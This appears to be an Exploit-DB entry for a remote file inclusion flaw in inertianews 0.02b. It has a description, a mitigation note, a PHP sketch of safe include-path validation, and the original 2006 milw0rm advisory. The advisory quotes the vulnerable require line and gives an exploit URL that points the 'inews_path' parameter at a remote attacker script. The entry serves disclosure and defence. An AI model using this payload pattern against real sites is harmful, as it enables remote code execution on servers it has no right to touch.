Vendor: inertianews
By: bd0rk
CVSS: 9,3 (HIGH)
Vulnerability type: Remote File Include
CWE: 98
Product Name: inertianews
Affected Version From: 0.02b
Affected Version To: 0.02b
Patch Exists: YES
Related CWE: N/A
CPE: a:inertianews:inertianews:0.02b
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

inertianews 0.02b Remote File Include Vulnerability

A vulnerability exists in inertianews 0.02b which allows a remote attacker to include a file from a remote host. The vulnerability is due to the 'inews_path' parameter in 'inertianews_main.php' not being properly sanitized before it is used in a 'require' statement. This can be exploited to include arbitrary files from remote hosts, resulting in arbitrary remote code execution.

Mitigation:

Input should be validated and filtered for malicious characters before being used in a 'require' statement.
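
A sketch of this mitigation, as an added example (not the vendor's patch and not code from inertianews): rather than filtering characters, the include directory is canonicalised with realpath() and must resolve to a file inside the install directory. The helper name `inews_safe_include_path`, the temporary demo directory and the candidate values are assumptions constructed for illustration.

```php
<?php
declare(strict_types=1);

// Vulnerable form quoted on this page ($inews_path can be set by the request):
//   require ("$inews_path/inertia_sql_class.php");
// Defence in depth in php.ini (PHP 5.2+): allow_url_include = Off

// Hypothetical helper (not part of inertianews): return the include target only
// if it is an existing file under the trusted base directory.
function inews_safe_include_path(string $baseDir, string $candidateDir, string $file): string
{
    // Refuse stream wrappers (http://, ftp://, php://, data: ...) and NUL bytes.
    // Two or more scheme characters are required so "C:\..." is not a false hit.
    if (preg_match('#^[a-z][a-z0-9+.-]+:#i', $candidateDir) || strpos($candidateDir, "\0") !== false) {
        throw new InvalidArgumentException('include path must be a local directory');
    }
    $base = realpath($baseDir);
    // realpath() collapses ../ and symlinks and returns false if nothing exists there.
    $target = realpath($candidateDir . DIRECTORY_SEPARATOR . basename($file));
    if ($base === false || $target === false
        || strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new InvalidArgumentException('include path is outside the application directory');
    }
    return $target;
}

// Constructed demo: a temporary directory stands in for the inertianews install.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inews_demo_' . getmypid();
mkdir($base);
file_put_contents("$base/inertia_sql_class.php", "<?php // stub class file\n");

// Constructed candidate values for inews_path: one legitimate, three rejected.
$candidates = [$base, 'http://example.invalid/x', "$base/..", 'data:text/plain,x'];
foreach ($candidates as $candidate) {
    try {
        $path = inews_safe_include_path($base, $candidate, 'inertia_sql_class.php');
        require_once $path;
        echo "included: $path\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected '$candidate': {$e->getMessage()}\n";
    }
}
unlink("$base/inertia_sql_class.php");
rmdir($base);
```

In the application itself the directory would be assigned from `__DIR__` before the `require` rather than read from the request, with the helper acting as a second check.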

Exploit-DB raw data:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                     +
+ inertianews 0.02b Remote File Include Vulnerability +
+                                                     +
+ Found3R: bd0rk || SOH-Crew                          +
+                                                     +
+ eMail: bd0rk[at]hackermail.com                      +
+                                                     +
+ Greetz: str0ke, TheJT, Axel H., Carsten S.          +
+                                                     +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++

Download: http://www.brentc.com/inertianews/download/inertianews02b.zip

=> Vulnerable Code in inertianews_main.php <=

Code: require ("$inews_path/inertia_sql_class.php");

[+]Exploit: http://[host]/[inertia_dir]/inertianews_main.php?inews_path=http://[TroubleScript]

Special-Greetz: ajann, Kacper, Google-Team :-)

# milw0rm.com [2006-12-21]